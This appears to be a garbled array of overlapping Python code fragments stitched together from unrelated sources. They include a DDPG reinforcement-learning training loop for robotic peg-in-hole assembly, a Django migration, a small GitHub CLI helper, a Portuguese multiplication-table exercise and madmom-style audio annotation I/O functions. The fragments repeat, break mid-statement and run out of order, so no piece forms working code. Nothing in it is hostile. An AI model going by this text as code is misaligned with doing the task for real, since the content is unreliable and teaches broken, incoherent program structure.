epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps - 1: logger.info('Peg-in-hole assembly failed for", "os import time from collections import deque import pickle import sys from baselines", "0. done = False forcement = [] Last_average_reward = 0. Number_episodes = 0.", "[] epoch_episode_steps = [] epoch_adaptive_distances = [] epoch_episodes_discount_reward = [] epoch_episodes_average_reward = []", "-*- coding: utf-8 -*- import os import time from collections import deque import", "agent.reset() obs = env.reset() episode_reward = 0. episode_discount_reward = 0. q_value = 0.", "nb_rollout_steps, nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action =", "if info is False: logger.info('Peg-in-hole assembly failed for the exceed force!!!') # pull_done", "epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps - 1: logger.info('Peg-in-hole assembly failed", "mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration = time.time() - epoch_start_time stats", "== nb_rollout_steps - 1: logger.info('Peg-in-hole assembly failed for exceed steps!!!') logger.info('The deepest position'.format(obs[8]))", "epoch_adaptive_distances.append(distance) \"\"\"write the result into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes)", "combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the model and the result\"\"\" saver.save(sess, model_directory + 'simulation_model')", "info is False: logger.info('Peg-in-hole assembly failed for the exceed force!!!') # pull_done =", "as pd \"\"\"First the path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs, nb_epoch_cycles,", "exit() break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps", "env.step_up() #Simulation env # pull_done, pull_safe = env.pull_up() #True env # # if", "render: # forcement.append(new_obs[0:6]) # # print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if epoch", "train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr,", "1 # pull_done = False # while pull_done is False and info: #", "agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3]))) + \" The maximum moments:\" +", "epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes)", "and start pull the pegs step by step\"\"\" if info is False: logger.info('Peg-in-hole", "import deque import pickle import sys from baselines import logger from simulation_ddpg import", "r delta = r - Long_term_reward # if memory.nb_entries >= batch_size and param_noise", "rate\"\"\" epoch_actor_lr = actor_lr / delay_rate epoch_critic_lr = critic_lr / delay_rate for cycle", "= [] epoch_qs = [] Force_moments = [] epoch_episodes = 0 Long_term_reward =", "env.state_dim, env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart,", "------------------------------------------------- File Name: Simulate_main Description : Author : <NAME> date: 18-1-12 ------------------------------------------------- Change", "next action\"\"\" action, q = agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0] == env.action_dim q_value", "in env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic, memory, env.state_dim, env.action_dim, gamma=gamma,", "epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise, if necessary\"\"\" if memory.nb_entries >= batch_size and", "<NAME> date: 18-1-12 ------------------------------------------------- Change Activity: 18-1-12 ------------------------------------------------- \"\"\" # -*- coding: utf-8", "+ 'simulation_forcement', sep=',', header=False, index=False) # re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', header=False,", "deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\" if restore: saver", "param_noise_adaption_interval=50, restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2])", "memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2, 0.2,", "# if memory.nb_entries >= batch_size and param_noise is not None: # agent.feed_back_explore(delta) Number_episodes", "False and info: # pull_done, pull_safe = env.step_up() #Simulation env # pull_done, pull_safe", "header=None) for key in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('') logdir = logger.get_dir() if", "epoch_actor_losses = [] epoch_critic_losses = [] \"\"\"Delay the learning rate\"\"\" epoch_actor_lr = actor_lr", "# env.plot_force(forcement, t_rollout + 1) if epoch == nb_epoch_cycles - 1 and cycle", "= logger.get_dir() if rank == 0 and logdir: if hasattr(env, 'get_state'): with open(os.path.join(logdir,", "\"\"\" agent.reset() obs = env.reset() episode_reward = 0. episode_discount_reward = 0. q_value =", "0 \"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce() is False: # exit() delay_rate = np.power(10,", "* r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3]))) + \" The", "everything\"\"\" if restore: saver = tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess)", ">= batch_size and param_noise is not None: # agent.feed_back_explore(delta) Number_episodes = gamma +", "\"\"\" # -*- coding: utf-8 -*- import os import time from collections import", "logger.dump_tabular() logger.info('') logdir = logger.get_dir() if rank == 0 and logdir: if hasattr(env,", "tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2, 0.2, 0.2,", "1) epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs, done) obs = new_obs \"\"\"Episode done and", "t_rollout + 1) if epoch == nb_epoch_cycles - 1 and cycle == nb_epoch_cycles", "# if env.robot_control.CalibFCforce() is False: # exit() delay_rate = np.power(10, 1 / nb_epochs)", "pull_safe = env.pull_up() #True env # # if pull_safe is False: # logger.info('Pull", "step\"\"\" if info is False: logger.info('Peg-in-hole assembly failed for the exceed force!!!') #", "the learning rate\"\"\" epoch_actor_lr = actor_lr / delay_rate epoch_critic_lr = critic_lr / delay_rate", "execution in env\"\"\" new_obs, r, done, info, expert_action = env.step(action, t_rollout) episode_discount_reward +=", "env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm,", "agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\",", "delay_rate = np.power(10, 1 / nb_epochs) epoch_start_time = time.time() epoch_episode_rewards = [] epoch_episode_steps", "def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic, normalize_returns, normalize_observations, critic_l2_reg,", "# pull_done, pull_safe = env.pull_up() #True env # # if pull_safe is False:", "combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] =", "# saver = tf.train.Saver() # else: # saver = None # eval_episode_rewards_history =", "pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False) # nf = pd.read_csv(\"data.csv\", sep=',', header=None) for", "\"\"\"train model for nb_train_steps times\"\"\" for t_train in range(nb_train_steps): cl, al = agent.train(epoch_actor_lr,", "header=False, index=False) # re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False) # nf", "the exceed force!!!') # exit() break \"\"\"Episode failed and start pull the pegs", "mpi_mean(epoch_adaptive_distances) \"\"\"save the model and the result\"\"\" saver.save(sess, model_directory + 'simulation_model') # re_rewards", "mpi_mean(stats[key]) \"\"\"Rollout statistics. compute the mean of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards)", "cycle 20 times and Save the model\"\"\" epoch_actor_losses = [] epoch_critic_losses = []", "= time.time() - epoch_start_time stats = agent.get_stats() combined_stats = {} for key in", "logger.info('The deepest position'.format(obs[8])) \"\"\"train model for nb_train_steps times\"\"\" for t_train in range(nb_train_steps): cl,", "# re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False) # nf = pd.read_csv(\"data.csv\", sep=',', header=None) for key", "pegs step by step\"\"\" if info is False: logger.info('Peg-in-hole assembly failed for the", "0.10 for epoch in range(nb_epochs): \"\"\"Show the result for cycle 20 times and", "if memory.nb_entries >= batch_size and param_noise is not None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance)", "epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1 # pull_done = False # while pull_done", "# re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False,", "param_noise is not None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result into the", "\"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the", "re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False, index=False) # re_steps = pd.DataFrame(epoch_episode_steps)", "delay_rate epoch_critic_lr = critic_lr / delay_rate for cycle in range(nb_epoch_cycles): \"\"\"environment reset \"\"\"", "nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr,", "into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\"," ]
[ "on 2019-12-30 10:47 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "import migrations, models class Migration(migrations.Migration): dependencies = [ ('secret', '0001_initial'), ] operations =", "2019-12-30 10:47 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('secret',", "# Generated by Django 2.2.9 on 2019-12-30 10:47 from django.db import migrations, models", "Django 2.2.9 on 2019-12-30 10:47 from django.db import migrations, models class Migration(migrations.Migration): dependencies", "dependencies = [ ('secret', '0001_initial'), ] operations = [ migrations.AlterField( model_name='secret', name='expiry_date', field=models.DateTimeField(blank=True,", "= [ ('secret', '0001_initial'), ] operations = [ migrations.AlterField( model_name='secret', name='expiry_date', field=models.DateTimeField(blank=True, null=True),", "models class Migration(migrations.Migration): dependencies = [ ('secret', '0001_initial'), ] operations = [ migrations.AlterField(", "2.2.9 on 2019-12-30 10:47 from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "[ ('secret', '0001_initial'), ] operations = [ migrations.AlterField( model_name='secret', name='expiry_date', field=models.DateTimeField(blank=True, null=True), ),", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('secret', '0001_initial'), ] operations", "10:47 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('secret', '0001_initial'),", "by Django 2.2.9 on 2019-12-30 10:47 from django.db import migrations, models class Migration(migrations.Migration):", "Generated by Django 2.2.9 on 2019-12-30 10:47 from django.db import migrations, models class", "Migration(migrations.Migration): dependencies = [ ('secret', '0001_initial'), ] operations = [ migrations.AlterField( model_name='secret', name='expiry_date',", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('secret', '0001_initial'), ]", "class Migration(migrations.Migration): dependencies = [ ('secret', '0001_initial'), ] operations = [ migrations.AlterField( model_name='secret',", "migrations, models class Migration(migrations.Migration): dependencies = [ ('secret', '0001_initial'), ] operations = [", "('secret', '0001_initial'), ] operations = [ migrations.AlterField( model_name='secret', name='expiry_date', field=models.DateTimeField(blank=True, null=True), ), ]" ]
[ "pr def handle_category_action(args): \"\"\"Handle the category specific action.\"\"\" category = args.category return {'issue':", "module.\"\"\" from .issue import issue from .pr import pr def handle_category_action(args): \"\"\"Handle the", "\"\"\"Main module.\"\"\" from .issue import issue from .pr import pr def handle_category_action(args): \"\"\"Handle", "def handle_category_action(args): \"\"\"Handle the category specific action.\"\"\" category = args.category return {'issue': issue,", "from .pr import pr def handle_category_action(args): \"\"\"Handle the category specific action.\"\"\" category =", "the category specific action.\"\"\" category = args.category return {'issue': issue, 'pr': pr}.get(category, issue)", ".issue import issue from .pr import pr def handle_category_action(args): \"\"\"Handle the category specific", "import pr def handle_category_action(args): \"\"\"Handle the category specific action.\"\"\" category = args.category return", "handle_category_action(args): \"\"\"Handle the category specific action.\"\"\" category = args.category return {'issue': issue, 'pr':", "issue from .pr import pr def handle_category_action(args): \"\"\"Handle the category specific action.\"\"\" category", "\"\"\"Handle the category specific action.\"\"\" category = args.category return {'issue': issue, 'pr': pr}.get(category,", "<gh_stars>0 \"\"\"Main module.\"\"\" from .issue import issue from .pr import pr def handle_category_action(args):", ".pr import pr def handle_category_action(args): \"\"\"Handle the category specific action.\"\"\" category = args.category", "import issue from .pr import pr def handle_category_action(args): \"\"\"Handle the category specific action.\"\"\"", "from .issue import issue from .pr import pr def handle_category_action(args): \"\"\"Handle the category" ]
[ "= {5*n1}') print(f'6 x {n1} = {6*n1}') print(f'7 x {n1} = {7*n1}') print(f'8", "na tela a sua tabuada. n1 = int(input('Digite um número qualquer: ')) print('-'*13)", "{n1} = {4*n1}') print(f'5 x {n1} = {5*n1}') print(f'6 x {n1} = {6*n1}')", "# Faça um programa que leia um número inteiro qualquer e mostre na", "{n1} = {8*n1}') print(f'9 x {n1} = {9*n1}') print(f'10 x {n1} = {10*n1}')", "um programa que leia um número inteiro qualquer e mostre na tela a", "{5*n1}') print(f'6 x {n1} = {6*n1}') print(f'7 x {n1} = {7*n1}') print(f'8 x", "print(f'7 x {n1} = {7*n1}') print(f'8 x {n1} = {8*n1}') print(f'9 x {n1}", "qualquer e mostre na tela a sua tabuada. n1 = int(input('Digite um número", "print(f'3 x {n1} = {3*n1}') print(f'4 x {n1} = {4*n1}') print(f'5 x {n1}", "{4*n1}') print(f'5 x {n1} = {5*n1}') print(f'6 x {n1} = {6*n1}') print(f'7 x", "{7*n1}') print(f'8 x {n1} = {8*n1}') print(f'9 x {n1} = {9*n1}') print(f'10 x", "{n1} = {1*n1}') print(f'2 x {n1} = {2*n1}') print(f'3 x {n1} = {3*n1}')", "que leia um número inteiro qualquer e mostre na tela a sua tabuada.", "= {3*n1}') print(f'4 x {n1} = {4*n1}') print(f'5 x {n1} = {5*n1}') print(f'6", "print(f'2 x {n1} = {2*n1}') print(f'3 x {n1} = {3*n1}') print(f'4 x {n1}", "= int(input('Digite um número qualquer: ')) print('-'*13) print(f'1 x {n1} = {1*n1}') print(f'2", "= {7*n1}') print(f'8 x {n1} = {8*n1}') print(f'9 x {n1} = {9*n1}') print(f'10", "{n1} = {7*n1}') print(f'8 x {n1} = {8*n1}') print(f'9 x {n1} = {9*n1}')", "x {n1} = {7*n1}') print(f'8 x {n1} = {8*n1}') print(f'9 x {n1} =", "{n1} = {6*n1}') print(f'7 x {n1} = {7*n1}') print(f'8 x {n1} = {8*n1}')", "e mostre na tela a sua tabuada. n1 = int(input('Digite um número qualquer:", "= {2*n1}') print(f'3 x {n1} = {3*n1}') print(f'4 x {n1} = {4*n1}') print(f'5", "x {n1} = {3*n1}') print(f'4 x {n1} = {4*n1}') print(f'5 x {n1} =", "programa que leia um número inteiro qualquer e mostre na tela a sua", "x {n1} = {4*n1}') print(f'5 x {n1} = {5*n1}') print(f'6 x {n1} =", "')) print('-'*13) print(f'1 x {n1} = {1*n1}') print(f'2 x {n1} = {2*n1}') print(f'3", "= {8*n1}') print(f'9 x {n1} = {9*n1}') print(f'10 x {n1} = {10*n1}') print('-'*13)", "{3*n1}') print(f'4 x {n1} = {4*n1}') print(f'5 x {n1} = {5*n1}') print(f'6 x", "mostre na tela a sua tabuada. n1 = int(input('Digite um número qualquer: '))", "print('-'*13) print(f'1 x {n1} = {1*n1}') print(f'2 x {n1} = {2*n1}') print(f'3 x", "Faça um programa que leia um número inteiro qualquer e mostre na tela", "sua tabuada. n1 = int(input('Digite um número qualquer: ')) print('-'*13) print(f'1 x {n1}", "print(f'1 x {n1} = {1*n1}') print(f'2 x {n1} = {2*n1}') print(f'3 x {n1}", "print(f'4 x {n1} = {4*n1}') print(f'5 x {n1} = {5*n1}') print(f'6 x {n1}", "{6*n1}') print(f'7 x {n1} = {7*n1}') print(f'8 x {n1} = {8*n1}') print(f'9 x", "{n1} = {3*n1}') print(f'4 x {n1} = {4*n1}') print(f'5 x {n1} = {5*n1}')", "qualquer: ')) print('-'*13) print(f'1 x {n1} = {1*n1}') print(f'2 x {n1} = {2*n1}')", "tela a sua tabuada. n1 = int(input('Digite um número qualquer: ')) print('-'*13) print(f'1", "inteiro qualquer e mostre na tela a sua tabuada. n1 = int(input('Digite um", "{1*n1}') print(f'2 x {n1} = {2*n1}') print(f'3 x {n1} = {3*n1}') print(f'4 x", "x {n1} = {5*n1}') print(f'6 x {n1} = {6*n1}') print(f'7 x {n1} =", "x {n1} = {8*n1}') print(f'9 x {n1} = {9*n1}') print(f'10 x {n1} =", "x {n1} = {2*n1}') print(f'3 x {n1} = {3*n1}') print(f'4 x {n1} =", "um número qualquer: ')) print('-'*13) print(f'1 x {n1} = {1*n1}') print(f'2 x {n1}", "{n1} = {5*n1}') print(f'6 x {n1} = {6*n1}') print(f'7 x {n1} = {7*n1}')", "= {4*n1}') print(f'5 x {n1} = {5*n1}') print(f'6 x {n1} = {6*n1}') print(f'7", "{n1} = {2*n1}') print(f'3 x {n1} = {3*n1}') print(f'4 x {n1} = {4*n1}')", "x {n1} = {6*n1}') print(f'7 x {n1} = {7*n1}') print(f'8 x {n1} =", "tabuada. n1 = int(input('Digite um número qualquer: ')) print('-'*13) print(f'1 x {n1} =", "{2*n1}') print(f'3 x {n1} = {3*n1}') print(f'4 x {n1} = {4*n1}') print(f'5 x", "x {n1} = {1*n1}') print(f'2 x {n1} = {2*n1}') print(f'3 x {n1} =", "print(f'6 x {n1} = {6*n1}') print(f'7 x {n1} = {7*n1}') print(f'8 x {n1}", "int(input('Digite um número qualquer: ')) print('-'*13) print(f'1 x {n1} = {1*n1}') print(f'2 x", "leia um número inteiro qualquer e mostre na tela a sua tabuada. n1", "um número inteiro qualquer e mostre na tela a sua tabuada. n1 =", "número inteiro qualquer e mostre na tela a sua tabuada. n1 = int(input('Digite", "a sua tabuada. n1 = int(input('Digite um número qualquer: ')) print('-'*13) print(f'1 x", "= {6*n1}') print(f'7 x {n1} = {7*n1}') print(f'8 x {n1} = {8*n1}') print(f'9", "print(f'8 x {n1} = {8*n1}') print(f'9 x {n1} = {9*n1}') print(f'10 x {n1}", "= {1*n1}') print(f'2 x {n1} = {2*n1}') print(f'3 x {n1} = {3*n1}') print(f'4", "print(f'5 x {n1} = {5*n1}') print(f'6 x {n1} = {6*n1}') print(f'7 x {n1}", "n1 = int(input('Digite um número qualquer: ')) print('-'*13) print(f'1 x {n1} = {1*n1}')", "número qualquer: ')) print('-'*13) print(f'1 x {n1} = {1*n1}') print(f'2 x {n1} =" ]
[ "relative strength to a file. Parameters ---------- tempi : numpy array Array with", "the file if needed if fid: fid.close() @suppress_warnings def load_events(filename): \"\"\" Load a", "t2 = strength = np.nan # only one tempo was detected if len(tempi)", "information from the given file. Tempo information must have the following format: 'main", "less than tempi) if len(tempi) - len(strengths) == 1: strengths = np.append(strengths, 1.", "'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None): \"\"\" Write the", "contain labelled segments # 'label' needs to be castable to str SEGMENT_DTYPE =", "as comment. Returns ------- key : str Key name. \"\"\" write_events([key], filename, fmt='%s',", "1. # consider only the two strongest tempi and strengths elif len(tempi) >", "to load the events from. Returns ------- numpy array Events. Notes ----- Comments", "> 1: if downbeats: # rows with a \"1\" in the 2nd column", "read the labelled segments from. Returns ------- segments : numpy structured array Structured", "if needed if fid: fid.close() @suppress_warnings def load_events(filename): \"\"\" Load a events from", ": float The most dominant tempo. tempo_2 : float The second most dominant", "'%.3f'), a sequence of formats, or a multi-format string (e.g. '%.3f %.3f'), in", "f.flush() load_onsets = load_events write_onsets = write_events @suppress_warnings def load_beats(filename, downbeats=False): \"\"\" Load", "distinguish between tempi and strengths. `values` > `split_value` are interpreted as tempi [bpm],", "a sequence of formats (e.g. ['%.3f', '%d']), or a multi-format string (e.g. '%.3f", "# dtype for numpy structured arrays that contain labelled segments # 'label' needs", "'%.3f', '%s']), or a multi-format string (e.g. '%.3f %.3f %s'), in which case", "to write the events to. fmt : str or sequence of strs, optional", "numpy structured array with three named columns: 'start' contains the start position (e.g.", "tempi and the relative strength to a file. Parameters ---------- tempi : numpy", "segments are represented as numpy structured array with three named columns: 'start' contains", "the beats from. downbeats : bool, optional Load only downbeats instead of beats.", "to contain only the downbeats (i.e. only the times of those beats with", "np.sum(strengths) # relative strengths are given (one less than tempi) if len(tempi) -", "number of colums given fmt = delimiter.join(fmt[:notes.shape[1]]) # write the notes write_events(notes, filename,", "format: 'main tempo' ['secondary tempo' ['relative_strength']] Parameters ---------- filename : str or file", "\"\"\" Write key string to a file. Parameters ---------- key : str Key", "is deprecated as of version 0.16 and ' 'will be removed in 0.18.", "strengths elif len(tempi) > 1: t1, t2 = tempi[:2, 0] strength = tempi[0,", "in 0.18. Please truncate the returned array ' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def", "ValueError('unknown format for `notes`') # truncate format to the number of colums given", "sort the ' 'tempi manually') if t1 > t2: t1, t2, strength =", "the returned array ' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t', header=None,", "str or file handle File to read the labelled segments from. Returns -------", "If `beats` contains both time and number of the beats, they are filtered", "if fmt is None: fmt = ['%.3f', '%.3f', '%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter,", "file, one floating point number per line. Parameters ---------- filename : str or", "import warnings warnings.warn('`sort` is deprecated as of version 0.16 and will be '", "truncate the returned array ' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t',", "(e.g. ['%.3f', '%d']), or a multi-format string (e.g. '%.3f %d'), in which case", "def open_file(filename, mode='r'): \"\"\" Context manager which yields an open file or handle", "'%.3f %d'), in which case `delimiter` is ignored. delimiter : str, optional String", "to. fmt : str or sequence of strs, optional A single format (e.g.", "\"\"\" Load tempo information from the given file. Tempo information must have the", "the given file. Tempo information must have the following format: 'main tempo' ['secondary", ": str Key name. filename : str or file handle Output file. header", "formats (e.g. ['%.3f', '%d']), or a multi-format string (e.g. '%.3f %d'), in which", "= values[values <= split_value] # make the strengths behave properly strength_sum = np.sum(strengths)", "into tempi and strengths # TODO: this is kind of hack-ish, find a", "column is the event's time, the rest is ignored return events[:, 0] def", "and will be ' 'removed in 0.18. Please truncate the returned array '", "array of length 'num_tempi' is returned. If strengths are given, a 2D array", "import contextlib import numpy as np from .audio import load_audio_file from .midi import", "point number per line. Parameters ---------- filename : str or file handle File", "numpy array and write to output out = np.array([t1, t2, strength], ndmin=2) write_events(out,", "file. delimiter : str, optional String or character separating columns. header : str,", "file handle File to load the beats from. downbeats : bool, optional Load", "the notes to. fmt : str or sequence of strs, optional A sequence", "the strengths behave properly strength_sum = np.sum(strengths) # relative strengths are given (one", "------- numpy array Notes. \"\"\" return np.loadtxt(filename, ndmin=2) def write_notes(notes, filename, fmt=None, delimiter='\\t',", "ndmin=1) if values.ndim > 1: if downbeats: # rows with a \"1\" in", "str or file handle File to write the notes to. fmt : str", "= line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start segments['end']", "of formats, or a multi-format string (e.g. '%.3f %.3f'), in which case `delimiter`", "we want # tempi with uniformly distributed strengths to keep their order sort_idx", "was detected if len(tempi) == 1: t1 = tempi[0][0] strength = 1. #", "'%.3f %d %.3f %d', in which case `delimiter` is ignored. delimiter : str,", "File to read key information from. Returns ------- str Key. \"\"\" with open_file(filename)", "of the file as comment. Returns ------- key : str Key name. \"\"\"", "None: fmt = ['%.3f', '%.3f', '%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header) load_chords =", "are floating point numbers, and <label> is a string. Parameters ---------- filename :", "or file handle Output file. delimiter : str, optional String or character separating", "the segment label. \"\"\" if fmt is None: fmt = ['%.3f', '%.3f', '%s']", "the beginning of the file as comment. mirex : bool, deprecated Report the", "structured array with three named columns: 'start' contains the start position (e.g. seconds),", "filename : str or file handle File (handle) to open. mode: {'r', 'w'}", ": str or file handle File to load the downbeats from. Returns -------", "f.read().strip() def write_key(key, filename, header=None): \"\"\" Write key string to a file. Parameters", "# TODO: this is kind of hack-ish, find a better solution tempi =", "# set default format if fmt is None: fmt = ['%.3f', '%d', '%.3f',", "text file, one floating point number per line. Parameters ---------- filename : str", "'%.3f' write_events(beats, filename, fmt, delimiter, header) @suppress_warnings def load_notes(filename): \"\"\" Load the notes", "structured arrays that contain labelled segments # 'label' needs to be castable to", "<= `split_value` are interpreted as strengths. sort : bool, deprecated Sort the tempi", "as comment. Returns ------- numpy structured array Labelled segments Notes ----- Labelled segments", "number of 1). \"\"\" if beats.ndim == 2: beats = beats[beats[:, 1] ==", "structured array Structured array with columns 'start', 'end', and 'label', containing the beginning,", "Tempo information must have the following format: 'main tempo' ['secondary tempo' ['relative_strength']] Parameters", "in 0.18. Please sort the returned array ' 'separately.') # Note: use 'mergesort',", "handle File (handle) to open. mode: {'r', 'w'} Specifies the mode in which", "'%d', '%.3f', '%d']), or a multi-format string, e.g. '%.3f %d %.3f %d', in", "e in events: try: string = fmt % tuple(e.tolist()) except AttributeError: string =", "if values.ndim > 1: if downbeats: # rows with a \"1\" in the", "Beats or downbeats to be written to file. filename : str or file", "format (e.g. '%.3f'), a sequence of formats, or a multi-format string (e.g. '%.3f", "numpy array Events to be written to file. filename : str or file", "def load_notes(filename): \"\"\" Load the notes from the given file, one note per", "fmt is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) @suppress_warnings def", "or handle. fmt : str or sequence of strs, optional A sequence of", "strength_sum = np.sum(strengths) # relative strengths are given (one less than tempi) if", "strengths to keep their order sort_idx = (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths =", "('end', np.float), ('label', object)] # overwrite the built-in open() to transparently apply some", "information from. Returns ------- str Key. \"\"\" with open_file(filename) as f: return f.read().strip()", "import absolute_import, division, print_function import io as _io import contextlib import numpy as", "to their filename into tempi and strengths # TODO: this is kind of", "write_events(beats, filename, fmt, delimiter, header) @suppress_warnings def load_notes(filename): \"\"\" Load the notes from", "------- numpy array Events. Notes ----- Comments (lines starting with '#') and additional", "Notes. \"\"\" return np.loadtxt(filename, ndmin=2) def write_notes(notes, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write", "most `max_len` tempi. Returns ------- tempi : numpy array, shape (num_tempi[, 2]) Array", "which yields an open file or handle with the given mode and closes", "array ' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None): \"\"\"", "of version 0.16 ' 'and will be removed in version 0.17. Please sort", "their strengths if sort: import warnings warnings.warn('`sort` is deprecated as of version 0.16", "return values[values[:, 1] == 1][:, 0] else: # 1st column is the beat", "np.array(events) # reformat fmt to be a single string if needed if isinstance(fmt,", "comment. \"\"\" events = np.array(events) # reformat fmt to be a single string", "`notes`') # truncate format to the number of colums given fmt = delimiter.join(fmt[:notes.shape[1]])", "a sequence of formats, or a multi-format string (e.g. '%.3f %.3f'), in which", "header + '\\n').encode(ENCODING))) # write events for e in events: try: string =", "raise AssertionError('tempi and strengths must have same length') 